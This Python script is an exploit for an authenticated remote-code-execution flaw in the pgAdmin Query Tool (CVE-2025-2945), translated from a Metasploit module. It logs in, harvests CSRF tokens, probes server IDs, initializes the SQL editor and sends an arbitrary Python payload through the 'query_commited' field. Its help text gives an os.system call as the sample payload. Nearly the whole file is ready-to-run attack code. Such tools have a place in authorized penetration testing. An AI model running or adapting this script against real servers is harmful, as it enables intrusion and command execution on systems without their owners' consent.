#!/usr/bin/env python3 import argparse import json import random import sys from urllib.parse import urljoin, urlencode import requests from faker import Faker '''' The attacker must possess valid pgAdmin credentials (username/password) to log in via POST /login Translated from Metasploit module “pgAdmin Query Tool authenticated RCE (CVE-2025-2945)” - Original Ruby: https://github.com/rapid7/metasploit-framework - This Python script reproduces the same steps: 1) Authenticate to pgAdmin 2) Initialize the SQL editor (gets a transaction ID, sgid, sid, did) 3) Iterate over server IDs until one “works” 4) POST a malicious payload via `query_commited` → expected 500 response ''' fake = Faker() class PgAdminExploit: def __init__(self, args): self.rhost = args.rhost self.rport = args.rport self.username = args.username self.password = args.password self.db_user = args.db_user self.db_pass = args.db_pass self.db_name = args.db_name self.max_server_id = args.max_server_id self.payload = args.payload self.scheme = "http" self.base_url = f"{self.scheme}://{self.rhost}:{self.rport}" self.session = requests.Session() # Some default headers—Metasploit’s HttpClient sets things like a User-Agent, etc. self.session.headers.update({ "User-Agent": "Mozilla/5.0 (Exploit Script)", }) def get_csrf_token(self, from_page="/"): """ Attempt to pull CSRF token out of cookies or hidden fields. pgAdmin4 often sets one of: - a cookie named "pga_csrf_token" or "pgaCookieCsrfToken" or "csrftoken" - a hidden in the login page We first do a GET to `from_page` so that cookies get set. """ resp = self.session.get(urljoin(self.base_url, from_page), allow_redirects=True) # 1) Try known cookie names: for ck in ("pga_csrf_token", "pgaCookieCsrfToken", "csrftoken"): if ck in self.session.cookies: return self.session.cookies.get(ck) # 2) Fallback: try to parse a hidden input from HTML # (in many pgAdmin versions, login page has: ) text = resp.text marker = 'name="csrf_token" value="' idx = text.find(marker) if idx != -1: start = idx + len(marker) end = text.find('"', start) if end != -1: return text[start:end] print("[!] Unable to retrieve CSRF token. Exiting.") sys.exit(1) def authenticate(self): """ Replicates the `authenticate(datastore['USERNAME'], datastore['PASSWORD'])` call in the Ruby module. We: 1) GET /login to retrieve CSRF 2) POST /login with form data {email, password, csrf_token} """ print("[*] Fetching CSRF token from login page...") csrf_token = self.get_csrf_token("/login") login_url = urljoin(self.base_url, "/login") data = { "email": self.username, "password": self.password, "csrf_token": csrf_token } headers = { "Referer": login_url } resp = self.session.post(login_url, data=data, headers=headers, allow_redirects=False) # pgAdmin typically redirects to /browser/ if login succeeds if resp.status_code not in (302, 303): print(f"[!] Login failed or unexpected status code: {resp.status_code}") sys.exit(1) print("[+] Authenticated to pgAdmin successfully.") def get_post_data(self): """ Translated from `get_post_data` in Ruby: title = Faker::App.name.downcase selectedNodeInfo => { database: { id: Faker::App.name.downcase } } return URI.encode_www_form(...) """ title = fake.app_name().lower() db_id = fake.app_name().lower() payload_dict = { "title": title, "selectedNodeInfo": { "database": { "id": db_id } } } # We return URL‐encoded form data (as a string) return urlencode(payload_dict) def post_initialize_sqleditor(self, trans_id, sgid, sid, did, csrf_token): """ Equivalent to Ruby: send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/sqleditor/initialize/sqleditor/#{trans_id}/#{sgid}/#{sid}/#{did}"), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/json', 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, 'data' => { 'user' => DB_USER, 'password' => DB_PASS, 'role' => '', 'dbname' => DB_NAME }.to_json }) """ url = urljoin(self.base_url, f"/sqleditor/initialize/sqleditor/{trans_id}/{sgid}/{sid}/{did}") headers = { "Content-Type": "application/json", "X-pgA-CSRFToken": csrf_token } data = { "user": self.db_user, "password": self.db_pass, "role": "", "dbname": self.db_name } print(f"[*] Initializing SQL editor: trans_id={trans_id}, sgid={sgid}, sid={sid}, did={did}") resp = self.session.post(url, headers=headers, json=data) if resp.status_code != 200: try: err = resp.json().get("result", {}).get("errmsg", "unknown error") except Exception: err = resp.text or "unknown error" print(f"[!] Failed to initialize sqleditor: {err}") sys.exit(1) print("[+] Successfully initialized sqleditor.") def find_valid_server_id(self, sgid, csrf_token): """ Same as Ruby's find_valid_server_id(sgid): for sid in 1..MAX_SERVER_ID: GET /sqleditor/get_server_connection/{sgid}/{sid} with X-pgA-CSRFToken if response.data.status → return sid if none found, fail. """ for sid in range(1, self.max_server_id + 1): print(f"[*] Trying server ID: {sid}") url = urljoin(self.base_url, f"/sqleditor/get_server_connection/{sgid}/{sid}") headers = { "X-pgA-CSRFToken": csrf_token, "Content-Type": "application/x-www-form-urlencoded" } resp = self.session.get(url, headers=headers) if resp.status_code != 200: continue try: j = resp.json() except ValueError: continue # Ruby does: if res&.get_json_document&.dig('data','status') status = j.get("data", {}).get("status") if status: print(f"[+] Found valid server ID: {sid}") return sid print("[!] Failed to find a valid server ID. Try increasing MAX_SERVER_ID.") sys.exit(1) def sqleditor_init(self, trans_id, csrf_token): """ Ruby: sgid = rand(1..10) did = rand(10000..99999) sid = find_valid_server_id(sgid) post_initialize_sqleditor(trans_id, sgid, sid, did) """ sgid = random.randint(1, 10) did = random.randint(10000, 99999) sid = self.find_valid_server_id(sgid, csrf_token) self.post_initialize_sqleditor(trans_id, sgid, sid, did, csrf_token) # Return sgid, sid, did if needed later (not strictly required here) return sgid, sid, did def exploit(self): """ Puts it all together: 1) authenticate() 2) trans_id = rand(1_000_000..9_999_999) 3) sqleditor_init(trans_id) 4) POST to /sqleditor/query_tool/download/{trans_id} with JSON { query_commited: payload } → expects a 500 response """ self.authenticate() # Step 1: Generate a fresh transaction ID trans_id = random.randint(1_000_000, 9_999_999) print(f"[*] Generated transaction ID: {trans_id}") # Step 2: Get a fresh CSRF token (after login, cookies may have changed) print("[*] Fetching a fresh CSRF token for sqleditor operations...") csrf_token = self.get_csrf_token(f"/sqleditor/panel/{trans_id}?is_query_tool=true") # Step 3: Initialize the SQL editor (find sgid/sid/did + POST that info) self.sqleditor_init(trans_id, csrf_token) # Step 4: Send the final exploit payload print("[*] Exploiting the target by sending payload...") exploit_url = urljoin(self.base_url, f"/sqleditor/query_tool/download/{trans_id}") headers = { "Content-Type": "application/json", "X-PgA-CSRFToken": csrf_token, # The Metasploit module also sent a Referer header: "Referer": f"{self.base_url}/sqleditor/panel/{trans_id}?is_query_tool=true" } data = { "query_commited": self.payload } resp = self.session.post(exploit_url, headers=headers, json=data, allow_redirects=False) if resp is None: print("[!] No response received from exploit attempt.") sys.exit(1) if resp.status_code == 500: print("[+] Received a 500 response from the exploit attempt (expected).") print("[+] If the payload is correct, remote code execution should have occurred.") else: print(f"[!] Received an unexpected response code: {resp.status_code}") print(f" Response body:\n{resp.text}") def main(): parser = argparse.ArgumentParser(description="pgAdmin Query Tool authenticated RCE (CVE-2025-2945) exploit in Python") parser.add_argument("--rhost", required=True, help="Target pgAdmin host (IP or hostname)") parser.add_argument("--rport", required=False, type=int, default=80, help="Target pgAdmin port (default: 80)") parser.add_argument("--username", required=True, help="pgAdmin username") parser.add_argument("--password", required=True, help="pgAdmin password") parser.add_argument("--db-user", dest="db_user", required=True, help="Database user (to initialize SQL editor)") parser.add_argument("--db-pass", dest="db_pass", required=True, help="Database password") parser.add_argument("--db-name", dest="db_name", required=True, help="Database name") parser.add_argument("--payload", required=True, help="Arbitrary Python payload to send in `query_commited`. (e.g. \"__import__('os').system('id')\")") parser.add_argument("--max-server-id", dest="max_server_id", type=int, default=10, help="Maximum number of server IDs to try (default: 10)") args = parser.parse_args() exploit = PgAdminExploit(args) exploit.exploit() if __name__ == "__main__": main()